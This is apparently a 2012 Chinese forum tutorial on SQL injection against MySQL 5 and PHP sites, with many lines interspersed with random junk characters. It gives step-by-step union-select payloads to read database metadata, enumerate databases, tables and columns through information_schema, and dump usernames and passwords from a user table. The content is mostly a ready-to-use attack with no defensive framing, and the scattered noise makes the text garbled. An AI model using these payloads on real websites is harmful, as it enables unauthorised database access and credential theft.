+ [8 M) B: g1 F9 D0 g- A教程内容:Mysql 5+php 注入
1 D" Y2 ?; ^, e% L P; G' Q- S$ f" l) T
& P" N) H1 W- l- w9 x! d0 N
1 j$ K1 T: [+ `一.查看MYSQL基本信息(库名,版本,用户)
, f( l# v4 l6 S6 k) J: s5 T% v% {) w/ l M* G/ a
and 1=2 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8/*
|5 Q% ]4 R$ T5 A' x& D& _* y/ J- I2 m
二.查数据库: W6 o4 N* `; n0 X! [! E0 R% h' s" `5 p
4 Q- G6 p$ K* `$ @9 _9 Z& N2 ?
and 1=2 union select 1,SCHEMA_NAME,3,4,5,6,7,8 from information_schema.SCHEMATA limit 1,1/*
@' i0 M! i0 p) P4 }! L0 klimit 从0开始递增,查询到3时浏览器返回错误,说明存在2个库。
% I2 X( }) K( d1 b ]
$ z2 I7 h! i, y3 r) n; C三.暴表- ^1 x0 l/ I7 B% G% M
' L. q8 X7 i6 G( G9 {+ J6 u+ Zand 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8 from information_schema.TABLES where TABLE_SCHEMA =库的16进制编码 limit 1,1/*
4 k* U4 ~6 K) o' t
! a0 U" L1 Q, s* w" B" M" m+ Rlimit 从0开始递增,查询到14时浏览器返回错误,说明此库存在13个表。6 k* M( Y5 a5 J4 {2 L1 A
& l/ o$ M1 O. x: P; r
四.暴字段
5 l0 X' c. J& A$ T
9 j& ^& k5 s [# ~and 1=2 union select 1,2,3,COLUMN_NAME,4,5,6,7,8from information_schema.COLUMNS where TABLE_NAME=表的16进制编码 limit 1,1/*
: n1 b, V0 L6 u; _5 J# E: @& a& n$ z+ g; @; ]& l' X
limit 从0开始递增,查询到时浏览器返回错误,说明此表存在N-1个列。
7 E6 }- T% v1 a+ M! U5 t6 I+ p
; h5 S0 `% i7 U0 M五.暴数据, i- o# @% {: v/ d/ s" X2 b6 d: l" x( e
# ]# F9 s1 `$ l( z- cand 1=2 union select 1,2,3,name,5,password,7,8 from web.ad_user/*
7 t; b+ ~1 i- P% z! p9 X: M3 B2 W1 v
$ m8 \- a4 m) I8 F! _) M& N8 \! p7 }7 Q
这里直接暴明文的密码,大多时候我们遇到的是MD5加密之后的密文。
4 g2 s, D, g5 g9 m+ T3 Y( q |
发表于 2012-9-13 16:27:53
收藏
支持
反对